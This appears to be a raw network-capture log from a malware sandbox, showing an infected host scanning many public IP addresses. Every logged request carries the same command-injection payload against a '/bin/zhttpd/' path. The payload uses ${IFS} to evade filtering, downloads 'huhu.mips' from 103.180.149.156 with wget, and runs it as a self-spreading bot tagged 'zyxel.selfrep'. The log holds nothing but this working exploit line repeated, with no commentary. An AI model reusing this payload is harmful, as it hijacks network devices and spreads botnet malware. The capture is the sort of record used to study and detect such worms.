                                            Feb 2, 2024 06:21:16.699563980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5210192.168.2.1555440159.7.219.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699572086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5211192.168.2.1537754153.68.132.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699592113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5212192.168.2.1556098168.99.2.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699630976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5213192.168.2.1553260148.64.50.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699662924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5214192.168.2.154564873.117.194.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699753046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5215192.168.2.153946236.159.57.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699821949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5216192.168.2.1557828168.244.217.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699845076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5217192.168.2.1546214194.104.0.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699903011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5218192.168.2.154403457.51.56.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699934959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5219192.168.2.1537054221.74.47.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.699986935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5220192.168.2.1558854179.229.57.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700012922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5221192.168.2.154750289.109.29.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700037003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5222192.168.2.1537660195.196.196.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700125933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5223192.168.2.153323074.67.54.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700145960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5224192.168.2.154970089.55.53.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700186014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5225192.168.2.1532856193.60.232.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700208902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5226192.168.2.155201414.93.108.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700251102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5227192.168.2.154283213.253.112.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700305939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5228192.168.2.155286889.183.144.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700337887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5229192.168.2.155812219.196.5.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700361967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5230192.168.2.154587666.53.21.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700376987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5231192.168.2.1553328220.67.100.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700438023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5232192.168.2.1551034116.126.71.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700484991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5233192.168.2.1550350146.91.207.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700525999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5234192.168.2.155039850.89.154.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700545073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5235192.168.2.154945219.222.200.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700579882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5236192.168.2.1544124139.175.255.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700630903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5237192.168.2.154707672.103.17.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700670958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5238192.168.2.1542046119.205.52.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700706005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5239192.168.2.1536486155.50.45.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700748920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5240192.168.2.155245632.88.118.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700773001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5241192.168.2.1551258157.169.76.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700814009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5242192.168.2.155858687.68.74.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700841904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5243192.168.2.153827291.71.243.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700875998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5244192.168.2.1554520171.36.8.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700900078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5245192.168.2.1537204163.126.30.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700936079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5246192.168.2.1546314171.148.18.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.700993061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5247192.168.2.1540370217.250.100.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701021910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5248192.168.2.155730837.244.154.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701054096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5249192.168.2.1560332183.33.116.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701090097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5250192.168.2.1556272141.93.56.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701132059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5251192.168.2.156016841.217.130.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701183081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5252192.168.2.153658839.82.182.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701229095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5253192.168.2.1535170109.93.230.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701248884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5254192.168.2.1539102154.16.124.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701286077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5255192.168.2.1534900116.187.203.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701307058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5256192.168.2.154775862.19.213.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701347113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5257192.168.2.1547000176.107.65.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701376915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5258192.168.2.1541760106.158.207.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701432943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5259192.168.2.1536002202.71.23.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701464891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5260192.168.2.1553638149.195.138.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701499939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5261192.168.2.153471641.239.167.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701522112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5262192.168.2.154336239.16.212.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701551914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5263192.168.2.1545958175.193.58.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701605082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5264192.168.2.1557060172.132.62.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701633930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5265192.168.2.1536396200.158.203.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701687098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5266192.168.2.154730488.33.46.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701710939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5267192.168.2.154364420.7.148.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701772928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5268192.168.2.154553491.178.56.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701819897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5269192.168.2.15604108.54.52.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701833010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5270192.168.2.1540996162.242.176.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701884985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5271192.168.2.155721237.19.76.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701919079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5272192.168.2.1549238123.156.200.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.701972008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5273192.168.2.1538070116.209.10.33443
                                            TimestampBytes transferredDirectionData
